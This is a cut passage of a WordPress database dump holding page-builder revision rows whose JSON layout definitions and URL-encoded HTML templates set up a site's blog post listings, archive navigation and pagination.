uthor\",\"check\":true,\"icon\":\"icons8-line-awesome\\/user\",\"id\":1,\"prefix\":\"by \"},{\"value\":\"date\",\"name\":\"Date\",\"check\":false,\"icon\":\"icons8-line-awesome\\/calendar\",\"id\":2,\"prefix\":\"on \"},{\"value\":\"time\",\"name\":\"Time\",\"check\":false,\"icon\":\"icons8-line-awesome\\/clock-o\",\"id\":3,\"prefix\":\"at \"},{\"value\":\"comments\",\"name\":\"Comments\",\"check\":false,\"icon\":\"icons8-line-awesome\\/comments\",\"id\":4,\"prefix\":\"\",\"suffix\":\"comments\"}],\"separator\":\"| \",\"showIcons\":false,\"dateFormat\":\"M j\"},\"slot\":null,\"parentId\":\"34-m7\",\"index\":1,\"id\":\"34-m8\",\"partialId\":34,\"styleRef\":114,\"type\":\"main\"},{\"name\":\"hop-post-meta\",\"props\":{\"metadata\":[{\"value\":\"author\",\"name\":\"Author\",\"check\":false,\"icon\":\"icons8-line-awesome\\/user\",\"id\":1,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"date\",\"name\":\"Date\",\"check\":true,\"icon\":\"icons8-line-awesome\\/calendar\",\"id\":2,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"time\",\"name\":\"Time\",\"check\":false,\"icon\":\"icons8-line-awesome\\/clock-o\",\"id\":3,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"comments\",\"name\":\"Comments\",\"check\":false,\"icon\":\"icons8-line-awesome\\/comments\",\"id\":4,\"prefix\":\"\",\"suffix\":\"\"}],\"showIcons\":false},\"slot\":null,\"parentId\":\"34-m7\",\"index\":1,\"id\":\"34-m9\",\"partialId\":34,\"styleRef\":115,\"type\":\"main\"},{\"name\":\"hop-post-title\",\"id\":\"34-m10\",\"parentId\":\"34-m7\",\"partialId\":34,\"styleRef\":116,\"type\":\"main\",\"props\":{\"headingType\":\"h4\"}},{\"name\":\"hop-post-excerpt\",\"id\":\"34-m11\",\"parentId\":\"34-m7\",\"partialId\":34,\"styleRef\":117,\"type\":\"main\",\"props\":{\"maxLength\":\"16\"}}],\"styleRef\":113,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"34-m4\",\"index\":1,\"id\":\"34-m6\",\"partialId\":34,\"styleRef\":112,\"type\":\"main\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"unit\":\"%\",\"value\":\"50\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"50\"}}}}}}},\"id\":\"34-m13\",\"parentId\":\"34-m12\",\"partialId\":34,\"children\":[{\"name\":\"hop-post-meta\",\"props\":{\"metadata\":[{\"value\":\"author\",\"name\":\"Author\",\"check\":false,\"icon\":\"icons8-line-awesome\\/user\",\"id\":1,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"date\",\"name\":\"Date\",\"check\":false,\"icon\":\"icons8-line-awesome\\/calendar\",\"id\":2,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"time\",\"name\":\"Time\",\"check\":false,\"icon\":\"icons8-line-awesome\\/clock-o\",\"id\":3,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"comments\",\"name\":\"Comments\",\"check\":true,\"icon\":\"icons8-line-awesome\\/comments\",\"id\":4,\"prefix\":\"\",\"suffix\":\"\"}],\"showIcons\":true,\"separator\":\"\"},\"slot\":null,\"parentId\":\"34-m13\",\"index\":0,\"id\":\"34-m14\",\"partialId\":34,\"styleRef\":120,\"type\":\"main\"}],\"styleRef\":119,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"unit\":\"%\",\"value\":\"50\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"50\"}}}}}}},\"id\":\"34-m15\",\"parentId\":\"34-m12\",\"partialId\":34,\"children\":[{\"name\":\"hop-post-read-more-group\",\"children\":[{\"name\":\"hop-post-read-more\",\"props\":{\"text\":\"read more\",\"iconName\":\"icons8-line-awesome\\/arrow-right\"},\"id\":\"34-m17\",\"parentId\":\"34-m16\",\"partialId\":34,\"styleRef\":123,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"34-m15\",\"index\":0,\"id\":\"34-m16\",\"partialId\":34,\"styleRef\":122,\"type\":\"main\"}],\"styleRef\":121,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"34-m4\",\"index\":1,\"id\":\"34-m12\",\"partialId\":34,\"styleRef\":118,\"type\":\"main\"}],\"id\":\"34-m4\",\"parentId\":\"34-m3\",\"partialId\":34,\"styleRef\":110,\"type\":\"main\"}]},\"slot\":null,\"parentId\":\"34-m2\",\"index\":0,\"id\":\"34-m3\",\"partialId\":34,\"styleRef\":109,\"type\":\"main\"},{\"name\":\"hop-post-nav-container\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"34-m19\",\"parentId\":\"34-m18\",\"partialId\":34,\"children\":[{\"name\":\"hop-archive-nav-button\",\"slot\":null,\"parentId\":\"34-m19\",\"index\":0,\"id\":\"34-m20\",\"partialId\":34,\"styleRef\":126,\"type\":\"main\",\"props\":{\"type\":\"prev\",\"prevLabel\":\"Previous\",\"stateType\":\"hover\"}}],\"styleRef\":125,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"34-m21\",\"parentId\":\"34-m18\",\"partialId\":34,\"children\":[{\"name\":\"hop-archive-pagination\",\"slot\":null,\"parentId\":\"34-m21\",\"index\":0,\"id\":\"34-m22\",\"partialId\":34,\"styleRef\":128,\"type\":\"main\",\"props\":{\"stateType\":\"\"}}],\"styleRef\":127,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"34-m23\",\"parentId\":\"34-m18\",\"partialId\":34,\"children\":[{\"name\":\"hop-archive-nav-button\",\"slot\":null,\"parentId\":\"34-m23\",\"index\":0,\"id\":\"34-m24\",\"partialId\":34,\"styleRef\":130,\"type\":\"main\",\"props\":{\"stateType\":\"hover\"}}],\"styleRef\":129,\"type\":\"main\"}],\"parentId\":\"34-m2\",\"index\":1,\"id\":\"34-m18\",\"partialId\":34,\"styleRef\":124,\"type\":\"main\"}],\"parentId\":\"34-m1\",\"type\":\"main\",\"props\":{\"anchor\":false,\"name\":\"Blog Posts\",\"attrs\":{\"id\":\"blog-posts\"}},\"id\":\"34-m2\",\"partialId\":34,\"styleRef\":104}],\"id\":\"34-m1\",\"partialId\":34,\"styleRef\":103,\"type\":\"main\"}','','','inherit','closed','closed','','35-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',35,'https://gsudice.dataconn.net/?p=63',0,'revision','',0),(64,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','<div data-colibri-id=\"34-m1\" class=\"style-103 style-local-34-m1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"34-m2\" id=\"blog-posts\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-104 style-local-34-m2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"34-m3\" class=\"h-row-container gutters-row-lg-3 gutters-row-md-2 gutters-row-2 gutters-row-v-lg-3 gutters-row-v-md-2 gutters-row-v-3 colibri-dynamic-list style-109 style-local-34-m3 position-relative\">\n        <!---->\n        <div data-colibri-component=\"masonry\" class=\"h-row justify-content-lg-start justify-content-md-start justify-content-start align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-3 gutters-col-md-2 gutters-col-2 gutters-col-v-lg-3 gutters-col-v-md-2 gutters-col-v-3 style-109-row style-local-34-m3-row\">\n          <!---->[colibri_loop query=\"false\"]%5Bcolibri_item_template%5D%0A%20%20%20%20%20%20%20%20%3Cdiv%20%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-6%20h-col-md-12%20h-col-12%20%5Bcolibri_post_class%5D%20masonry-item%20style-110-outer%20style-local-34-m4-outer%22%20%20%3E%3Cdiv%20%20%20data-colibri-id=%22435-m4%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-110%20style-local-34-m4%20h-overflow-hidden%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-href=%22%5Bcolibri_post_link%5D%22%20data-colibri-component=%22link%22%20%20data-colibri-id=%22435-m5%22%20class=%22colibri-post-thumbnail%20%5Bcolibri_post_thumbnail_classes%5D%20style-111%20style-local-34-m5%20h-overflow-hidden%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-global-transition-all%20colibri-post-thumbnail-shortcode%20style-dynamic-34-m5-height%22%3E%5Bcolibri_post_thumbnail%20link=%22true%22%5D%3C/div%3E%20%3Cdiv%20%20class=%22colibri-post-thumbnail-content%20align-items-lg-center%20align-items-md-center%20align-items-center%20flex-basis-100%22%3E%3Cdiv%20%20class=%22w-100%20h-y-container%22%3E%3C!----%3E%20%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22435-m6%22%20class=%22h-row-container%20gutters-row-lg-3%20gutters-row-md-3%20gutters-row-3%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-112%20style-local-34-m6%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-3%20gutters-col-md-3%20gutters-col-3%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-113-outer%20style-local-34-m7-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%22435-m7%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-3%20v-inner-md-3%20v-inner-3%20style-113%20style-local-34-m7%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22435-m8%22%20class=%22h-blog-meta%20style-114%20style-local-34-m8%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20name=%221%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eby%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_author_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_author_content%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22435-m9%22%20class=%22h-blog-meta%20style-115%20style-local-34-m9%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%3Cdiv%20name=%222%22%20class=%22metadata-item%22%3E%3C!----%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_date_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_date_content%20date_format=%22F%20j,%20Y%22%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22435-m10%22%20class=%22h-blog-title%20style-116%20style-local-34-m10%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_title%20heading_type=%22h4%22%20classes=%22colibri-word-wrap%22%5D%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22435-m11%22%20class=%22style-117%20style-local-34-m11%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_excerpt%20max_length=%2216%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22435-m12%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-118%20style-local-34-m12%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-119-outer%20style-local-34-m13-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%22435-m13%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-119%20style-local-34-m13%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22435-m14%22%20class=%22h-blog-meta%20style-120%20style-local-34-m14%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%3C!----%3E%3C!----%3E%3Cdiv%20name=%224%22%20class=%22metadata-item%22%3E%3C!----%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_comments_url%5D%22%3E%3Cspan%20%20class=%22h-svg-icon%22%3E%3C!--Icon%20by%20Icons8%20Line%20Awesome%20(https://icons8.com/line-awesome)--%3E%5Bcolibri_svg_icon%20name=icons8-line-awesome/comments%5D%3C/span%3E%5Bcolibri_post_meta_comments_content%5D%3C/a%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-121-outer%20style-local-34-m15-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%22435-m15%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-121%20style-local-34-m15%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20%20data-colibri-id=%22435-m16%22%20class=%22h-x-container%20style-122%20style-local-34-m16%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-x-container-inner%20style-dynamic-34-m16-group%22%3E%3C!----%3E%3Cspan%20%20%20class=%22h-button__outer%20style-123-outer%20style-local-34-m17-outer%20d-inline-flex%20h-element%22%20%20%20%20%3E%3Ca%20%20h-use-smooth-scroll=%22true%22%20href=%22%5Bcolibri_post_link%5D%22%20%20data-colibri-id=%22435-m17%22%20class=%22d-flex%20w-100%20align-items-center%20h-button%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20style-123%20style-local-34-m17%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cspan%20%3Eread%20more%3C/span%3E%20%3Cspan%20%20class=%22h-svg-icon%20h-button__icon%20style-123-icon%20style-local-34-m17-icon%22%3E%3C!--Icon%20by%20Icons8%20Line%20Awesome%20(https://icons8.com/line-awesome)--%3E%5Bcolibri_svg_icon%20name=icons8-line-awesome/arrow-right%5D%3C/span%3E%3C/a%3E%3C/span%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%0A%20%20%20%20%20%20%5B/colibri_item_template%5D%0A%20%20%20%20%20%20[/colibri_loop]\n          </div>\n      </div>[colibri_layout_wrapper name=\"navigation_container\"]\n      <div data-colibri-id=\"34-m18\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-124 style-local-34-m18 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-end justify-content-md-end justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-125-outer style-local-34-m19-outer\">\n            <div data-colibri-id=\"34-m19\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-125 style-local-34-m19 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"34-m20\" class=\"style-126 style-local-34-m20 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all archive-nav-button\">[colibri_archive_nav_button type=\"prev\" next_label=\"Next\" prev_label=\"Previous\"]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-127-outer style-local-34-m21-outer\">\n            <div data-colibri-id=\"34-m21\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-127 style-local-34-m21 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"34-m22\" class=\"style-128 style-local-34-m22 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all\">[colibri_archive_pagination]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-129-outer style-local-34-m23-outer\">\n            <div data-colibri-id=\"34-m23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-129 style-local-34-m23 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"34-m24\" class=\"style-130 style-local-34-m24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all archive-nav-button\">[colibri_archive_nav_button type=\"next\" next_label=\"Next\" prev_label=\"Back\"]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>[/colibri_layout_wrapper]</div>\n  </div>\n</div>','main_archive','','inherit','closed','closed','','34-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',34,'https://gsudice.dataconn.net/?p=64',0,'revision','',0),(65,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','{\"name\":\"hop-main\",\"children\":[{\"name\":\"hop-archive-loop\",\"slots\":{\"item\":[{\"name\":\"hop-loop-item\",\"children\":[{\"name\":\"hop-post-categories-container\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"40-m5\",\"parentId\":\"40-m4\",\"partialId\":40,\"children\":[{\"name\":\"hop-post-categories\",\"slot\":null,\"parentId\":\"40-m5\",\"index\":1,\"id\":\"40-m6\",\"partialId\":40,\"styleRef\":143,\"type\":\"main\",\"props\":{\"prefix\":\"\"}}],\"styleRef\":142,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"40-m3\",\"index\":1,\"id\":\"40-m4\",\"partialId\":40,\"styleRef\":141,\"type\":\"main\"},{\"name\":\"hop-post-title\",\"parentId\":\"40-m3\",\"id\":\"40-m7\",\"partialId\":40,\"styleRef\":144,\"type\":\"main\",\"props\":{\"headingType\":\"h4\"}},{\"name\":\"hop-post-meta\",\"parentId\":\"40-m3\",\"id\":\"40-m8\",\"partialId\":40,\"styleRef\":145,\"type\":\"main\",\"props\":{\"metadata\":[{\"value\":\"author\",\"name\":\"Author\",\"check\":true,\"icon\":\"icons8-line-awesome\\/user\",\"id\":1,\"prefix\":\"by \",\"suffix\":\"\"},{\"value\":\"date\",\"name\":\"Date\",\"check\":true,\"icon\":\"icons8-line-awesome\\/calendar\",\"id\":2,\"prefix\":\"on \",\"suffix\":\"\"},{\"value\":\"time\",\"name\":\"Time\",\"check\":false,\"icon\":\"icons8-line-awesome\\/clock-o\",\"id\":3,\"prefix\":\"at \",\"suffix\":\"\"},{\"value\":\"comments\",\"name\":\"Comments\",\"check\":false,\"icon\":\"icons8-line-awesome\\/comments\",\"id\":4,\"prefix\":\"\",\"suffix\":\"comments\"}],\"showIcons\":false,\"separator\":\"| \"},\"slot\":null,\"index\":3},{\"name\":\"hop-post-excerpt\",\"id\":\"40-m9\",\"parentId\":\"40-m3\",\"partialId\":40,\"styleRef\":146,\"type\":\"main\"},{\"name\":\"hop-post-read-more-group\",\"children\":[{\"name\":\"hop-post-read-more\",\"props\":{\"text\":\"read more\",\"iconName\":\"icons8-line-awesome\\/arrow-right\"},\"id\":\"40-m11\",\"parentId\":\"40-m10\",\"partialId\":40,\"styleRef\":148,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"40-m3\",\"index\":4,\"id\":\"40-m10\",\"partialId\":40,\"styleRef\":147,\"type\":\"main\"}],\"id\":\"40-m3\",\"parentId\":\"40-m2\",\"partialId\":40,\"styleRef\":140,\"type\":\"main\"}]},\"slot\":null,\"parentId\":\"40-m1\",\"index\":0,\"id\":\"40-m2\",\"partialId\":40,\"styleRef\":139,\"type\":\"main\"},{\"name\":\"hop-post-nav-container\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"id\":\"40-m13\",\"parentId\":\"40-m12\",\"partialId\":40,\"styleRef\":150,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"40-m14\",\"parentId\":\"40-m12\",\"partialId\":40,\"children\":[{\"name\":\"hop-archive-nav-button\",\"slot\":null,\"parentId\":\"40-m14\",\"index\":0,\"id\":\"40-m15\",\"partialId\":40,\"styleRef\":152,\"type\":\"main\",\"props\":{\"type\":\"prev\",\"stateType\":\"hover\",\"prevLabel\":\"Back\"}}],\"styleRef\":151,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"40-m16\",\"parentId\":\"40-m12\",\"partialId\":40,\"children\":[{\"name\":\"hop-archive-pagination\",\"slot\":null,\"parentId\":\"40-m16\",\"index\":0,\"id\":\"40-m17\",\"partialId\":40,\"styleRef\":154,\"type\":\"main\",\"props\":{\"stateType\":\"active\"}}],\"styleRef\":153,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"40-m18\",\"parentId\":\"40-m12\",\"partialId\":40,\"children\":[{\"name\":\"hop-archive-nav-button\",\"slot\":null,\"parentId\":\"40-m18\",\"index\":0,\"id\":\"40-m19\",\"partialId\":40,\"styleRef\":156,\"type\":\"main\",\"props\":{\"stateType\":\"hover\",\"nextLabel\":\"Next\"}}],\"styleRef\":155,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"40-m1\",\"index\":4,\"id\":\"40-m12\",\"partialId\":40,\"styleRef\":149,\"type\":\"main\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-archive-navigation\",\"slot\":null,\"parentId\":\"40-m21\",\"index\":1,\"id\":\"40-m22\",\"partialId\":40,\"styleRef\":159,\"type\":\"main\"}],\"id\":\"40-m21\",\"parentId\":\"40-m20\",\"partialId\":40,\"styleRef\":158,\"type\":\"main\"}],\"id\":\"40-m20\",\"parentId\":\"40-m1\",\"partialId\":40,\"styleRef\":157,\"type\":\"main\",\"props\":{\"name\":\"Search results\",\"attrs\":{\"id\":\"search-results\"}}}],\"id\":\"40-m1\",\"partialId\":40,\"styleRef\":138,\"type\":\"main\"}','','','inherit','closed','closed','','41-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',41,'https://gsudice.dataconn.net/?p=65',0,'revision','',0),(66,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','<div data-colibri-id=\"40-m1\" class=\"style-138 style-local-40-m1 position-relative\">\n  <!---->\n  <div data-colibri-id=\"40-m2\" class=\"h-row-container gutters-row-lg-3 gutters-row-md-3 gutters-row-2 gutters-row-v-lg-3 gutters-row-v-md-3 gutters-row-v-3 colibri-dynamic-list style-139 style-local-40-m2 position-relative\">\n    <!---->\n    <div data-colibri-component=\"\" class=\"h-row justify-content-lg-start justify-content-md-start justify-content-start align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-3 gutters-col-md-3 gutters-col-2 gutters-col-v-lg-3 gutters-col-v-md-3 gutters-col-v-3 style-139-row style-local-40-m2-row\">\n      <!---->[colibri_loop query=\"false\"]%5Bcolibri_item_template%5D%0A%20%20%20%20%20%20%20%20%3Cdiv%20%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-12%20h-col-md-12%20h-col-12%20%5Bcolibri_post_class%5D%20masonry-item%20style-140-outer%20style-local-40-m3-outer%22%20%20%3E%3Cdiv%20%20%20data-colibri-id=%22639-m3%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-3%20v-inner-md-3%20v-inner-3%20style-140%20style-local-40-m3%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%5Bcolibri_layout_wrapper%20name=%22categories_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%22639-m4%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-141%20style-local-40-m4%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-142-outer%20style-local-40-m5-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22639-m5%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-142%20style-local-40-m5%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22639-m6%22%20class=%22h-blog-categories%20style-143%20style-local-40-m6%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_categories%20prefix=%22%22%5D%3C/div%3E%3C/div%3E%3C/div%